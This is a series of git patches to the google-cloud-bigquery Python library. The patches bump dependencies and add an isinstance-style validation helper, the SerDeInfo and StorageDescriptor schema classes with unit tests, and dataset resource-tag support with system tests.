(#2101) --- .kokoro/docker/docs/requirements.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index fb6ffa272..48ace5de9 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -66,7 +66,7 @@ tomli==2.2.1 \ --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ 
--hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 # via nox -virtualenv==20.28.0 \ - --hash=sha256:23eae1b4516ecd610481eda647f3a7c09aea295055337331bb4e6892ecce47b0 \ - --hash=sha256:2c9c3262bb8e7b87ea801d715fae4495e6032450c71d2309be9550e7364049aa +virtualenv==20.28.1 \ + --hash=sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb \ + --hash=sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329 # via nox From 473c3c30ef5201154c295c41ae9d8a25435a9b3f Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 7 Jan 2025 00:17:03 +0100 Subject: [PATCH 045/202] chore(deps): update dependency grpcio to v1.69.0 (#2102) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ab73dbe87..71579867f 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -25,7 +25,7 @@ google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.66.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.68.1; python_version >= '3.8' +grpcio==1.69.0; python_version >= '3.8' idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 From b35d741fe564ac106b2bf9d033b08d808b114363 Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Thu, 9 Jan 2025 10:00:45 -0500 Subject: [PATCH 046/202] chore(python): exclude .github/workflows/unittest.yml in renovate config (#2103) Source-Link: https://github.com/googleapis/synthtool/commit/106d292bd234e5d9977231dcfbc4831e34eba13a Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:8ff1efe878e18bd82a0fb7b70bb86f77e7ab6901fed394440b6135db0ba8d84a Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 6 +++--- .kokoro/docker/docs/requirements.txt | 12 ++++++------ renovate.json | 2 +- 3 files changed, 10 insertions(+), 10 
deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 26306af66..10cf433a8 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -1,4 +1,4 @@ -# Copyright 2024 Google LLC +# Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:8e3e7e18255c22d1489258d0374c901c01f9c4fd77a12088670cd73d580aa737 -# created: 2024-12-17T00:59:58.625514486Z + digest: sha256:8ff1efe878e18bd82a0fb7b70bb86f77e7ab6901fed394440b6135db0ba8d84a +# created: 2025-01-09T12:01:16.422459506Z diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index 48ace5de9..f99a5c4aa 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -4,9 +4,9 @@ # # pip-compile --allow-unsafe --generate-hashes synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in # -argcomplete==3.5.3 \ - --hash=sha256:2ab2c4a215c59fd6caaff41a869480a23e8f6a5f910b266c1808037f4e375b61 \ - --hash=sha256:c12bf50eded8aebb298c7b7da7a5ff3ee24dffd9f5281867dfe1424b58c55392 +argcomplete==3.5.2 \ + --hash=sha256:036d020d79048a5d525bc63880d7a4b8d1668566b8a76daf1144c0bbe0f63472 \ + --hash=sha256:23146ed7ac4403b70bd6026402468942ceba34a6732255b9edf5b7354f68a6bb # via nox colorlog==6.9.0 \ --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ @@ -66,7 +66,7 @@ tomli==2.2.1 \ --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ --hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 # via nox -virtualenv==20.28.1 \ - --hash=sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb \ - --hash=sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329 
+virtualenv==20.28.0 \ + --hash=sha256:23eae1b4516ecd610481eda647f3a7c09aea295055337331bb4e6892ecce47b0 \ + --hash=sha256:2c9c3262bb8e7b87ea801d715fae4495e6032450c71d2309be9550e7364049aa # via nox diff --git a/renovate.json b/renovate.json index 39b2a0ec9..c7875c469 100644 --- a/renovate.json +++ b/renovate.json @@ -5,7 +5,7 @@ ":preserveSemverRanges", ":disableDependencyDashboard" ], - "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py"], + "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py", ".github/workflows/unittest.yml"], "pip_requirements": { "fileMatch": ["requirements-test.txt", "samples/[\\S/]*constraints.txt", "samples/[\\S/]*constraints-test.txt"] } From a2bebb95c5ef32ac7c7cbe19c3e7a9412cbee60d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 9 Jan 2025 13:42:37 -0500 Subject: [PATCH 047/202] feat: adds new input validation function similar to isinstance. (#2107) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: adds new function similar to isinstance. 
* πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- google/cloud/bigquery/_helpers.py | 32 ++++++++++++++++++++++++++++++- tests/unit/test__helpers.py | 32 +++++++++++++++++++++++++++++++ 2 files changed, 63 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index 1eda80712..ea47af28d 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -22,7 +22,7 @@ import re import os import warnings -from typing import Optional, Union +from typing import Optional, Union, Any, Tuple, Type from dateutil import relativedelta from google.cloud._helpers import UTC # type: ignore @@ -1004,3 +1004,33 @@ def _verify_job_config_type(job_config, expected_type, param_name="job_config"): job_config=job_config, ) ) + + +def _isinstance_or_raise( + value: Any, + dtype: Union[Type, Tuple[Type, ...]], + none_allowed: Optional[bool] = False, +) -> Any: + """Determine whether a value type matches a given datatype or None. + Args: + value (Any): Value to be checked. + dtype (type): Expected data type or tuple of data types. + none_allowed Optional(bool): whether value is allowed to be None. Default + is False. + Returns: + Any: Returns the input value if the type check is successful. + Raises: + TypeError: If the input value's type does not match the expected data type(s). + """ + if none_allowed and value is None: + return value + + if isinstance(value, dtype): + return value + + or_none = "" + if none_allowed: + or_none = " (or None)" + + msg = f"Pass {value} as a '{dtype}'{or_none}. Got {type(value)}." 
+ raise TypeError(msg) diff --git a/tests/unit/test__helpers.py b/tests/unit/test__helpers.py index 0a307498f..adba6327c 100644 --- a/tests/unit/test__helpers.py +++ b/tests/unit/test__helpers.py @@ -24,6 +24,7 @@ from unittest import mock import google.api_core +from google.cloud.bigquery._helpers import _isinstance_or_raise @pytest.mark.skipif( @@ -1661,3 +1662,34 @@ def test_w_env_var(self): host = self._call_fut() self.assertEqual(host, HOST) + + +class Test__isinstance_or_raise: + @pytest.mark.parametrize( + "value,dtype,none_allowed,expected", + [ + (None, str, True, None), + ("hello world.uri", str, True, "hello world.uri"), + ("hello world.uri", str, False, "hello world.uri"), + (None, (str, float), True, None), + ("hello world.uri", (str, float), True, "hello world.uri"), + ("hello world.uri", (str, float), False, "hello world.uri"), + ], + ) + def test__valid_isinstance_or_raise(self, value, dtype, none_allowed, expected): + result = _isinstance_or_raise(value, dtype, none_allowed=none_allowed) + assert result == expected + + @pytest.mark.parametrize( + "value,dtype,none_allowed,expected", + [ + (None, str, False, pytest.raises(TypeError)), + ({"key": "value"}, str, True, pytest.raises(TypeError)), + ({"key": "value"}, str, False, pytest.raises(TypeError)), + ({"key": "value"}, (str, float), True, pytest.raises(TypeError)), + ({"key": "value"}, (str, float), False, pytest.raises(TypeError)), + ], + ) + def test__invalid_isinstance_or_raise(self, value, dtype, none_allowed, expected): + with expected: + _isinstance_or_raise(value, dtype, none_allowed=none_allowed) From 62960f255d05b15940a8d2cdc595592175fada11 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 10 Jan 2025 13:22:06 -0500 Subject: [PATCH 048/202] feat: adds the SerDeInfo class and tests (#2108) * feat: adds SerDeInfo class and tests * cleans up type hints and some minor tweaks --- google/cloud/bigquery/schema.py | 88 +++++++++++++++++++++++++++++++ tests/unit/test_schema.py | 92 
+++++++++++++++++++++++++++++++-- 2 files changed, 176 insertions(+), 4 deletions(-) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index b062396cf..f93877d45 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -14,8 +14,10 @@ """Schemas for BigQuery tables / queries.""" +from __future__ import annotations import collections import enum +import typing from typing import Any, cast, Dict, Iterable, Optional, Union from google.cloud.bigquery import _helpers @@ -556,3 +558,89 @@ def to_api_repr(self) -> dict: """ answer = {"names": list(self.names)} return answer + + +class SerDeInfo: + """Serializer and deserializer information. + + Args: + serialization_library (str): Required. Specifies a fully-qualified class + name of the serialization library that is responsible for the + translation of data between table representation and the underlying + low-level input and output format structures. The maximum length is + 256 characters. + name (Optional[str]): Name of the SerDe. The maximum length is 256 + characters. + parameters: (Optional[dict[str, str]]): Key-value pairs that define the initialization + parameters for the serialization library. Maximum size 10 Kib. + """ + + def __init__( + self, + serialization_library: str, + name: Optional[str] = None, + parameters: Optional[dict[str, str]] = None, + ): + self._properties: Dict[str, Any] = {} + self.serialization_library = serialization_library + self.name = name + self.parameters = parameters + + @property + def serialization_library(self) -> str: + """Required. Specifies a fully-qualified class name of the serialization + library that is responsible for the translation of data between table + representation and the underlying low-level input and output format + structures. 
The maximum length is 256 characters.""" + + return typing.cast(str, self._properties.get("serializationLibrary")) + + @serialization_library.setter + def serialization_library(self, value: str): + value = _helpers._isinstance_or_raise(value, str, none_allowed=False) + self._properties["serializationLibrary"] = value + + @property + def name(self) -> Optional[str]: + """Optional. Name of the SerDe. The maximum length is 256 characters.""" + + return self._properties.get("name") + + @name.setter + def name(self, value: Optional[str] = None): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["name"] = value + + @property + def parameters(self) -> Optional[dict[str, str]]: + """Optional. Key-value pairs that define the initialization parameters + for the serialization library. Maximum size 10 Kib.""" + + return self._properties.get("parameters") + + @parameters.setter + def parameters(self, value: Optional[dict[str, str]] = None): + value = _helpers._isinstance_or_raise(value, dict, none_allowed=True) + self._properties["parameters"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. + """ + return self._properties + + @classmethod + def from_api_repr(cls, api_repr: dict) -> SerDeInfo: + """Factory: constructs an instance of the class (cls) + given its API representation. + Args: + resource (Dict[str, Any]): + API representation of the object to be instantiated. + Returns: + An instance of the class initialized with data from 'resource'. 
+ """ + config = cls("PLACEHOLDER") + config._properties = api_repr + return config diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 4b0b28158..380067dc8 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -20,6 +20,7 @@ from google.cloud import bigquery from google.cloud.bigquery.standard_sql import StandardSqlStructType +from google.cloud.bigquery import schema from google.cloud.bigquery.schema import PolicyTagList @@ -130,8 +131,6 @@ def test_constructor_range_str(self): self.assertEqual(field.range_element_type.element_type, "DATETIME") def test_to_api_repr(self): - from google.cloud.bigquery.schema import PolicyTagList - policy = PolicyTagList(names=("foo", "bar")) self.assertEqual( policy.to_api_repr(), @@ -886,8 +885,6 @@ def test_valid_mapping_representation(self): class TestPolicyTags(unittest.TestCase): @staticmethod def _get_target_class(): - from google.cloud.bigquery.schema import PolicyTagList - return PolicyTagList def _make_one(self, *args, **kw): @@ -1129,3 +1126,90 @@ def test_to_api_repr_parameterized(field, api): from google.cloud.bigquery.schema import SchemaField assert SchemaField(**field).to_api_repr() == api + + +class TestSerDeInfo: + """Tests for the SerDeInfo class.""" + + @staticmethod + def _get_target_class(): + return schema.SerDeInfo + + def _make_one(self, *args, **kwargs): + return self._get_target_class()(*args, **kwargs) + + @pytest.mark.parametrize( + "serialization_library,name,parameters", + [ + ("testpath.to.LazySimpleSerDe", None, None), + ("testpath.to.LazySimpleSerDe", "serde_name", None), + ("testpath.to.LazySimpleSerDe", None, {"key": "value"}), + ("testpath.to.LazySimpleSerDe", "serde_name", {"key": "value"}), + ], + ) + def test_ctor_valid_input(self, serialization_library, name, parameters): + serde_info = self._make_one( + serialization_library=serialization_library, + name=name, + parameters=parameters, + ) + assert serde_info.serialization_library == 
serialization_library + assert serde_info.name == name + assert serde_info.parameters == parameters + + @pytest.mark.parametrize( + "serialization_library,name,parameters", + [ + (123, None, None), + ("testpath.to.LazySimpleSerDe", 123, None), + ("testpath.to.LazySimpleSerDe", None, ["test", "list"]), + ("testpath.to.LazySimpleSerDe", None, 123), + ], + ) + def test_ctor_invalid_input(self, serialization_library, name, parameters): + with pytest.raises(TypeError) as e: + self._make_one( + serialization_library=serialization_library, + name=name, + parameters=parameters, + ) + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + def test_to_api_repr(self): + serde_info = self._make_one( + serialization_library="testpath.to.LazySimpleSerDe", + name="serde_name", + parameters={"key": "value"}, + ) + expected_repr = { + "serializationLibrary": "testpath.to.LazySimpleSerDe", + "name": "serde_name", + "parameters": {"key": "value"}, + } + assert serde_info.to_api_repr() == expected_repr + + def test_from_api_repr(self): + """GIVEN an api representation of a SerDeInfo object (i.e. resource) + WHEN converted into a SerDeInfo object using from_api_repr() + THEN it will have the representation in dict format as a SerDeInfo + object made directly (via _make_one()) and represented in dict format. + """ + api_repr = { + "serializationLibrary": "testpath.to.LazySimpleSerDe", + "name": "serde_name", + "parameters": {"key": "value"}, + } + + expected = self._make_one( + serialization_library="testpath.to.LazySimpleSerDe", + name="serde_name", + parameters={"key": "value"}, + ) + + klass = self._get_target_class() + result = klass.from_api_repr(api_repr) + + # We convert both to dict format because these classes do not have a + # __eq__() method to facilitate direct equality comparisons. 
+ assert result.to_api_repr() == expected.to_api_repr() From 6be0272ff25dac97a38ae4ee5aa02016dc82a0d8 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 14 Jan 2025 15:48:57 -0500 Subject: [PATCH 049/202] feat: adds StorageDescriptor and tests (#2109) * feat: adds StorageDescriptor and tests * updates attr names, corrects type hinting --- google/cloud/bigquery/schema.py | 118 +++++++++++++++++++++++++++++ tests/unit/test_schema.py | 128 ++++++++++++++++++++++++++++++++ 2 files changed, 246 insertions(+) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index f93877d45..8d62b2b5b 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -644,3 +644,121 @@ def from_api_repr(cls, api_repr: dict) -> SerDeInfo: config = cls("PLACEHOLDER") config._properties = api_repr return config + + +class StorageDescriptor: + """Contains information about how a table's data is stored and accessed by open + source query engines. + + Args: + input_format (Optional[str]): Specifies the fully qualified class name of + the InputFormat (e.g. + "org.apache.hadoop.hive.ql.io.orc.OrcInputFormat"). The maximum + length is 128 characters. + location_uri (Optional[str]): The physical location of the table (e.g. + 'gs://spark-dataproc-data/pangea-data/case_sensitive/' or + 'gs://spark-dataproc-data/pangea-data/'). The maximum length is + 2056 bytes. + output_format (Optional[str]): Specifies the fully qualified class name + of the OutputFormat (e.g. + "org.apache.hadoop.hive.ql.io.orc.OrcOutputFormat"). The maximum + length is 128 characters. + serde_info (Union[SerDeInfo, dict, None]): Serializer and deserializer information. 
+ """ + + def __init__( + self, + input_format: Optional[str] = None, + location_uri: Optional[str] = None, + output_format: Optional[str] = None, + serde_info: Union[SerDeInfo, dict, None] = None, + ): + self._properties: Dict[str, Any] = {} + self.input_format = input_format + self.location_uri = location_uri + self.output_format = output_format + # Using typing.cast() because mypy cannot wrap it's head around the fact that: + # the setter can accept Union[SerDeInfo, dict, None] + # but the getter will only ever return Optional[SerDeInfo]. + self.serde_info = typing.cast(Optional[SerDeInfo], serde_info) + + @property + def input_format(self) -> Optional[str]: + """Optional. Specifies the fully qualified class name of the InputFormat + (e.g. "org.apache.hadoop.hive.ql.io.orc.OrcInputFormat"). The maximum + length is 128 characters.""" + + return self._properties.get("inputFormat") + + @input_format.setter + def input_format(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["inputFormat"] = value + + @property + def location_uri(self) -> Optional[str]: + """Optional. The physical location of the table (e.g. 'gs://spark- + dataproc-data/pangea-data/case_sensitive/' or 'gs://spark-dataproc- + data/pangea-data/'). The maximum length is 2056 bytes.""" + + return self._properties.get("locationUri") + + @location_uri.setter + def location_uri(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["locationUri"] = value + + @property + def output_format(self) -> Optional[str]: + """Optional. Specifies the fully qualified class name of the + OutputFormat (e.g. "org.apache.hadoop.hive.ql.io.orc.OrcOutputFormat"). 
+ The maximum length is 128 characters.""" + + return self._properties.get("outputFormat") + + @output_format.setter + def output_format(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["outputFormat"] = value + + @property + def serde_info(self) -> Optional[SerDeInfo]: + """Optional. Serializer and deserializer information.""" + + prop = _helpers._get_sub_prop(self._properties, ["serDeInfo"]) + if prop is not None: + return typing.cast(SerDeInfo, SerDeInfo.from_api_repr(prop)) + return None + + @serde_info.setter + def serde_info(self, value: Union[SerDeInfo, dict, None]): + value = _helpers._isinstance_or_raise( + value, (SerDeInfo, dict), none_allowed=True + ) + + if isinstance(value, SerDeInfo): + self._properties["serDeInfo"] = value.to_api_repr() + else: + self._properties["serDeInfo"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. + """ + return self._properties + + @classmethod + def from_api_repr(cls, resource: dict) -> StorageDescriptor: + """Factory: constructs an instance of the class (cls) + given its API representation. + Args: + resource (Dict[str, Any]): + API representation of the object to be instantiated. + Returns: + An instance of the class initialized with data from 'resource'. + """ + config = cls() + config._properties = resource + return config diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 380067dc8..7e84dd63f 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -1213,3 +1213,131 @@ def test_from_api_repr(self): # We convert both to dict format because these classes do not have a # __eq__() method to facilitate direct equality comparisons. 
assert result.to_api_repr() == expected.to_api_repr() + + +class TestStorageDescriptor: + """Tests for the StorageDescriptor class.""" + + @staticmethod + def _get_target_class(): + return schema.StorageDescriptor + + def _make_one(self, *args, **kwargs): + return self._get_target_class()(*args, **kwargs) + + serdeinfo_resource = { + "serialization_library": "testpath.to.LazySimpleSerDe", + "name": "serde_lib_name", + "parameters": {"key": "value"}, + } + + SERDEINFO = schema.SerDeInfo("PLACEHOLDER").from_api_repr(serdeinfo_resource) + + STORAGEDESCRIPTOR = { + "inputFormat": "testpath.to.OrcInputFormat", + "locationUri": "gs://test/path/", + "outputFormat": "testpath.to.OrcOutputFormat", + "serDeInfo": SERDEINFO.to_api_repr(), + } + + @pytest.mark.parametrize( + "input_format,location_uri,output_format,serde_info", + [ + (None, None, None, None), + ("testpath.to.OrcInputFormat", None, None, None), + (None, "gs://test/path/", None, None), + (None, None, "testpath.to.OrcOutputFormat", None), + (None, None, None, SERDEINFO), + ( + "testpath.to.OrcInputFormat", + "gs://test/path/", + "testpath.to.OrcOutputFormat", + SERDEINFO, # uses SERDEINFO class format + ), + ( + "testpath.to.OrcInputFormat", + "gs://test/path/", + "testpath.to.OrcOutputFormat", + serdeinfo_resource, # uses api resource format (dict) + ), + ], + ) + def test_ctor_valid_input( + self, input_format, location_uri, output_format, serde_info + ): + storage_descriptor = self._make_one( + input_format=input_format, + location_uri=location_uri, + output_format=output_format, + serde_info=serde_info, + ) + assert storage_descriptor.input_format == input_format + assert storage_descriptor.location_uri == location_uri + assert storage_descriptor.output_format == output_format + if isinstance(serde_info, schema.SerDeInfo): + assert ( + storage_descriptor.serde_info.to_api_repr() == serde_info.to_api_repr() + ) + elif isinstance(serde_info, dict): + assert storage_descriptor.serde_info.to_api_repr() == 
serde_info + else: + assert storage_descriptor.serde_info is None + + @pytest.mark.parametrize( + "input_format,location_uri,output_format,serde_info", + [ + (123, None, None, None), + (None, 123, None, None), + (None, None, 123, None), + (None, None, None, 123), + ], + ) + def test_ctor_invalid_input( + self, input_format, location_uri, output_format, serde_info + ): + with pytest.raises(TypeError) as e: + self._make_one( + input_format=input_format, + location_uri=location_uri, + output_format=output_format, + serde_info=serde_info, + ) + + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + def test_to_api_repr(self): + storage_descriptor = self._make_one( + input_format="input_format", + location_uri="location_uri", + output_format="output_format", + serde_info=self.SERDEINFO, + ) + expected_repr = { + "inputFormat": "input_format", + "locationUri": "location_uri", + "outputFormat": "output_format", + "serDeInfo": self.SERDEINFO.to_api_repr(), + } + assert storage_descriptor.to_api_repr() == expected_repr + + def test_from_api_repr(self): + """GIVEN an api representation of a StorageDescriptor (i.e. STORAGEDESCRIPTOR) + WHEN converted into a StorageDescriptor using from_api_repr() and + displayed as a dict + THEN it will have the same representation a StorageDescriptor created + directly (via the _make_one() func) and displayed as a dict. 
+ """ + + # generate via STORAGEDESCRIPTOR + resource = self.STORAGEDESCRIPTOR + result = self._get_target_class().from_api_repr(resource) + # result = klass.from_api_repr(resource) + + expected = self._make_one( + input_format="testpath.to.OrcInputFormat", + location_uri="gs://test/path/", + output_format="testpath.to.OrcOutputFormat", + serde_info=self.SERDEINFO, + ) + assert result.to_api_repr() == expected.to_api_repr() From 3e130166f43dcc06704fe90edf9068dfd44842a6 Mon Sep 17 00:00:00 2001 From: Keunsoo Park <43742836+keunsoopark@users.noreply.github.com> Date: Tue, 14 Jan 2025 22:17:13 +0100 Subject: [PATCH 050/202] feat: resource tags in dataset (#2090) * feat: resource tags in dataset * fix: fix unittets * Delete dataset/pyvenv.cfg * Update google/cloud/bigquery/dataset.py Co-authored-by: Lingqing Gan * Update google/cloud/bigquery/dataset.py Co-authored-by: Lingqing Gan * added system tests & fix unittest for none * add missing assert * remove venv * include resourcemanager in noxfile.py * fix fixture for tag keys * register tags before using in tests * handle alreadyexist error * fix: tag keys & values creation & deletion * fix comment * make tag keys unique * remove unused import --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/dataset.py | 23 ++++++++ noxfile.py | 4 ++ tests/system/test_client.py | 90 ++++++++++++++++++++++++++++++- tests/unit/test_client.py | 6 +++ tests/unit/test_create_dataset.py | 5 ++ tests/unit/test_dataset.py | 22 ++++++++ 6 files changed, 148 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index c49a52faf..4d06d729d 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -530,6 +530,7 @@ class Dataset(object): "storage_billing_model": "storageBillingModel", "max_time_travel_hours": "maxTimeTravelHours", "default_rounding_mode": "defaultRoundingMode", + "resource_tags": "resourceTags", } def __init__(self, dataset_ref) -> 
None: @@ -801,6 +802,28 @@ def labels(self, value): raise ValueError("Pass a dict") self._properties["labels"] = value + @property + def resource_tags(self): + """Dict[str, str]: Resource tags of the dataset. + + Optional. The tags attached to this dataset. Tag keys are globally + unique. Tag key is expected to be in the namespaced format, for + example "123456789012/environment" where 123456789012 is + the ID of the parent organization or project resource for this tag + key. Tag value is expected to be the short name, for example + "Production". + + Raises: + ValueError: for invalid value types. + """ + return self._properties.setdefault("resourceTags", {}) + + @resource_tags.setter + def resource_tags(self, value): + if not isinstance(value, dict) and value is not None: + raise ValueError("Pass a dict") + self._properties["resourceTags"] = value + @property def default_encryption_configuration(self): """google.cloud.bigquery.encryption_configuration.EncryptionConfiguration: Custom diff --git a/noxfile.py b/noxfile.py index 750a6b459..e08956b11 100644 --- a/noxfile.py +++ b/noxfile.py @@ -219,6 +219,9 @@ def system(session): # Data Catalog needed for the column ACL test with a real Policy Tag. session.install("google-cloud-datacatalog", "-c", constraints_path) + # Resource Manager needed for test with a real Resource Tag. 
+ session.install("google-cloud-resource-manager", "-c", constraints_path) + if session.python in ["3.11", "3.12"]: extras = "[bqstorage,ipywidgets,pandas,tqdm,opentelemetry]" else: @@ -366,6 +369,7 @@ def prerelease_deps(session): session.install( "freezegun", "google-cloud-datacatalog", + "google-cloud-resource-manager", "google-cloud-storage", "google-cloud-testutils", "psutil", diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 95c679a14..c0dd83b12 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -25,6 +25,8 @@ import time import unittest import uuid +import random +import string from typing import Optional from google.api_core.exceptions import PreconditionFailed @@ -45,6 +47,8 @@ from google.cloud import storage from google.cloud.datacatalog_v1 import types as datacatalog_types from google.cloud.datacatalog_v1 import PolicyTagManagerClient +from google.cloud.resourcemanager_v3 import types as resourcemanager_types +from google.cloud.resourcemanager_v3 import TagKeysClient, TagValuesClient import psutil import pytest from test_utils.retry import RetryErrors @@ -156,9 +160,12 @@ def setUpModule(): class TestBigQuery(unittest.TestCase): def setUp(self): self.to_delete = [] + self.to_delete_tag_keys_values = [] def tearDown(self): policy_tag_client = PolicyTagManagerClient() + tag_keys_client = TagKeysClient() + tag_values_client = TagValuesClient() def _still_in_use(bad_request): return any( @@ -181,6 +188,18 @@ def _still_in_use(bad_request): else: doomed.delete() + # The TagKey cannot be deleted if it has any child TagValues. 
+ for key_values in self.to_delete_tag_keys_values: + tag_key = key_values.pop() + + # Delete tag values first + [ + tag_values_client.delete_tag_value(name=tag_value.name).result() + for tag_value in key_values + ] + + tag_keys_client.delete_tag_key(name=tag_key.name).result() + def test_get_service_account_email(self): client = Config.CLIENT @@ -278,24 +297,74 @@ def test_create_dataset_with_default_rounding_mode(self): self.assertTrue(_dataset_exists(dataset)) self.assertEqual(dataset.default_rounding_mode, "ROUND_HALF_EVEN") + def _create_resource_tag_key_and_values(self, key, values): + tag_key_client = TagKeysClient() + tag_value_client = TagValuesClient() + + tag_key_parent = f"projects/{Config.CLIENT.project}" + new_tag_key = resourcemanager_types.TagKey( + short_name=key, parent=tag_key_parent + ) + tag_key = tag_key_client.create_tag_key(tag_key=new_tag_key).result() + self.to_delete_tag_keys_values.insert(0, [tag_key]) + + for value in values: + new_tag_value = resourcemanager_types.TagValue( + short_name=value, parent=tag_key.name + ) + tag_value = tag_value_client.create_tag_value( + tag_value=new_tag_value + ).result() + self.to_delete_tag_keys_values[0].insert(0, tag_value) + def test_update_dataset(self): dataset = self.temp_dataset(_make_dataset_id("update_dataset")) self.assertTrue(_dataset_exists(dataset)) self.assertIsNone(dataset.friendly_name) self.assertIsNone(dataset.description) self.assertEqual(dataset.labels, {}) + self.assertEqual(dataset.resource_tags, {}) self.assertIs(dataset.is_case_insensitive, False) + # This creates unique tag keys for each of test runnings for different Python versions + tag_postfix = "".join(random.choices(string.ascii_letters + string.digits, k=4)) + tag_1 = f"env_{tag_postfix}" + tag_2 = f"component_{tag_postfix}" + tag_3 = f"project_{tag_postfix}" + + # Tags need to be created before they can be used in a dataset. 
+ self._create_resource_tag_key_and_values(tag_1, ["prod", "dev"]) + self._create_resource_tag_key_and_values(tag_2, ["batch"]) + self._create_resource_tag_key_and_values(tag_3, ["atlas"]) + dataset.friendly_name = "Friendly" dataset.description = "Description" dataset.labels = {"priority": "high", "color": "blue"} + dataset.resource_tags = { + f"{Config.CLIENT.project}/{tag_1}": "prod", + f"{Config.CLIENT.project}/{tag_2}": "batch", + } dataset.is_case_insensitive = True ds2 = Config.CLIENT.update_dataset( - dataset, ("friendly_name", "description", "labels", "is_case_insensitive") + dataset, + ( + "friendly_name", + "description", + "labels", + "resource_tags", + "is_case_insensitive", + ), ) self.assertEqual(ds2.friendly_name, "Friendly") self.assertEqual(ds2.description, "Description") self.assertEqual(ds2.labels, {"priority": "high", "color": "blue"}) + self.assertEqual( + ds2.resource_tags, + { + f"{Config.CLIENT.project}/{tag_1}": "prod", + f"{Config.CLIENT.project}/{tag_2}": "batch", + }, + ) self.assertIs(ds2.is_case_insensitive, True) ds2.labels = { @@ -303,8 +372,25 @@ def test_update_dataset(self): "shape": "circle", # add "priority": None, # delete } - ds3 = Config.CLIENT.update_dataset(ds2, ["labels"]) + ds2.resource_tags = { + f"{Config.CLIENT.project}/{tag_1}": "dev", # change + f"{Config.CLIENT.project}/{tag_3}": "atlas", # add + f"{Config.CLIENT.project}/{tag_2}": None, # delete + } + ds3 = Config.CLIENT.update_dataset(ds2, ["labels", 